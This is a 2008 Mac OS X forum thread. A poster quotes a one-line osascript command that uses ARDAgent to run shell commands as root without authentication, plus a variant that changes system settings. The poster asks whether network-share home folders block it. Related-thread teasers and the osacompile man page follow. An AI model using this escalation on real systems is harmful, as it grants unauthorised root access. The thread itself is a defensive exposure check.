ARD Agent vulnerability Post: 302207304

Sponsored Content

Operating Systems OS X (Apple) ARD Agent vulnerability Post 302207304 by afriend on Thursday 19th of June 2008 02:05:31 PM

06-19-2008

Registered User

ARD Agent vulnerability

today an anonymous slashdot user posted this little shell command, that uses the ARDAgent to gain root access, without ever needing to authenticate.

the script is:
osascript -e 'tell app "ARDAgent" to do shell script "whoami"'

Can be used to things like:
osascript -e 'tell app "ARDAgent" to do shell script "scutil --set ComputerName SomeName"'
that would normally require authentication.

It has been tested by quite a few people, and has been found only to work you are physically at a computer and its logged in.

However where I work we use Network Shares as our home folder, and this hack doesnt seem to work. And I just wanted to make sure that there was no way it would work.

When I run the command:
osascript -e 'tell app "ARDAgent" to do shell script "whoami"'

I get:
execution error: ARDAgent got an error: "whoami" doesn't understand the do shell script message. (-1708)

Anyone thinks its possible?

afriend

View Public Profile for afriend

Find all posts by afriend

5 More Discussions You Might Find Interesting

1. UNIX for Dummies Questions & Answers

Solaris agent

Hello, on Solaris 5.8 I've installed SunMgtCenter to get the time agent; it's under /opt/SUNWsymon/sbin/es-start -a it's in ps -ef | grep agent ...but it doesn't work; the machine is always in alarm cause the time is different of the clock server; is it clear enough ? tks cc

2. IP Networking

SNMP agent

Hi, I am really new in linux and SNMP. I have a SNMP agent in Linux (net-snmp). I have my MIB in the /usr/share/mibs directory, and I didn't manage to understand where and how do I put the values of the fields in the MIB? The values are static, so the agent need to return the same value in...

3. UNIX for Dummies Questions & Answers

perform agent

Hi, Please can someone explain me about the " perform agent " on UNIX . Thanx

4. UNIX for Dummies Questions & Answers

vcs agent

Hi all, I'm new to vcs. I have a doubt. I need to know, what will happen if an agent is stopped while reources being online. Eg.. while the oracle agent is stopped, will all the oracle resources will become offline.. Advanced thanks

5. Solaris

OV Server on 11 - need to install agent?

Client has got a few machines with logical domains on. But I can't see the the ovs-agent service? Quite possibly I guess this has been set up with just logical domains. With no agent. Do you need to use the agent only if planning to manage with OV Manager?

LEARN ABOUT OSX

osacompile

OSACOMPILE(1)						    BSD General Commands Manual 					     OSACOMPILE(1)

NAME

     osacompile -- compile AppleScripts and other OSA language scripts

SYNOPSIS

     osacompile [-l language] [-e command] [-o name] [-d] [-r type:id] [-t type] [-c creator] [-x] [-s] [-u] [-a arch] [file ...]

DESCRIPTION

     osacompile compiles the given files, or standard input if none are listed, into a single output script.  Files may be plain text or other
     compiled scripts.	The options are as follows:

     -l language
	   Override the language for any plain text files.  Normally, plain text files are compiled as AppleScript.

     -e command
	   Enter one line of a script.	Script commands given via -e are prepended to the normal source, if any.  Multiple -e options may be given
	   to build up a multi-line script.  Because most scripts use characters that are special to many shell programs (e.g., AppleScript uses
	   single and double quote marks, ``('', ``)'', and ``*''), the command will have to be correctly quoted and escaped to get it past the
	   shell intact.

     -o name
	   Place the output in the file name.  If -o is not specified, the resulting script is placed in the file ``a.scpt''.  The value of -o
	   partly determines the output file format; see below.

     -x    Save the resulting script as execute-only.

     The following options are only relevant when creating a new bundled applet or droplet:

     -s    Stay-open applet.

     -u    Use startup screen.

     -a arch
	   Create the applet or droplet for the specified target architecture arch.  The allowable values are ``ppc'', ``i386'', and ``x86_64''.
	   The default is to create a universal binary.

     The following options control the packaging of the output file.  You should only need them for compatibility with classic Mac OS or for cus-
     tom file formats.

     -d    Place the resulting script in the data fork of the output file.  This is the default.

     -r type:id
	   Place the resulting script in the resource fork of the output file, in the specified resource.

     -t type
	   Set the output file type to type, where type is a four-character code.  If this option is not specified, the creator code will not be
	   set.

     -c creator
	   Set the output file creator to creator, where creator is a four-character code.  If this option is not specified, the creator code will
	   not be set.

     If no options are specified, osacompile produces a Mac OS X format script file: data fork only, with no type or creator code.

     If the -o option is specified and the file does not already exist, osacompile uses the filename extension to determine what type of file to
     create.  If the filename ends with ``.app'', it creates a bundled applet or droplet.  If the filename ends with ``.scptd'', it creates a bun-
     dled compiled script.  Otherwise, it creates a flat file with the script data placed according to the values of the -d and -r options.

EXAMPLES

     To produce a script compatible with classic Mac OS:

	   osacompile -r scpt:128 -t osas -c ToyS example.applescript

SEE ALSO

     osascript(1), osalang(1)

Mac OS X							 November 12, 2008							  Mac OS X